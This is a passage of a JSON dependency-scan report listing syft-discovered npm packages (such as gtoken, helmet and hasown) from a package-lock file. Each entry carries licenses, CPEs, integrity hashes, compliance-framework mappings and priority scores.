} ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bb6c934fdca5487f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: gopd 1.2.0", "title": "gopd 1.2.0", "description": "Package discovered: gopd 1.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2f2433574e565258", "name": "gopd", "version": "1.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/gopd@1.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "30861bd8904bacc9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: graceful-fs 4.2.11", "title": "graceful-fs 4.2.11", "description": "Package discovered: graceful-fs 4.2.11", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "45319b4c36cfb339", "name": "graceful-fs", "version": "4.2.11", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/graceful-fs@4.2.11", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a916a255ccf430d7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: gtoken 7.1.0", "title": "gtoken 7.1.0", "description": "Package discovered: gtoken 7.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fe4d11ddc8ba95f7", "name": "gtoken", "version": "7.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/gtoken@7.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz", "integrity": "sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==", "dependencies": { "gaxios": "^6.0.0", "jws": "^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d28454794acf7740", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: has-symbols 1.1.0", "title": "has-symbols 1.1.0", "description": "Package discovered: has-symbols 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fcd80b2c54be3c8f", "name": "has-symbols", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/has-symbols@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f33597863ab8f3be", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: has-tostringtag 1.0.2", "title": "has-tostringtag 1.0.2", "description": "Package discovered: has-tostringtag 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7749e9981a33e1c1", "name": "has-tostringtag", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/has-tostringtag@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "dependencies": { "has-symbols": "^1.0.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "96e286f1b1295263", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: hasown 2.0.3", "title": "hasown 2.0.3", "description": "Package discovered: hasown 2.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6f96b80a7d603954", "name": "hasown", "version": "2.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/hasown@2.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz", "integrity": "sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==", "dependencies": { "function-bind": "^1.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "e883502c6fb5e040", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: helmet 7.2.0", "title": "helmet 7.2.0", "description": "Package discovered: helmet 7.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "ad14b3d3d950e009", "name": "helmet", "version": "7.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/helmet@7.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz", "integrity": "sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5ce7a5c301b19471", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: hsl-to-hex 1.0.0", "title": "hsl-to-hex 1.0.0", "description": "Package discovered: hsl-to-hex 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5912401178cdcd30", "name": "hsl-to-hex", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/hsl-to-hex@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz", "integrity": "sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA==", "dependencies": { "hsl-to-rgb-for-reals": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "342f7c75e7dae76e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: hsl-to-rgb-for-reals 1.1.1", "title": "hsl-to-rgb-for-reals 1.1.1", "description": "Package discovered: hsl-to-rgb-for-reals 1.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "52590567976abaf8", "name": "hsl-to-rgb-for-reals", "version": "1.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*", "source": 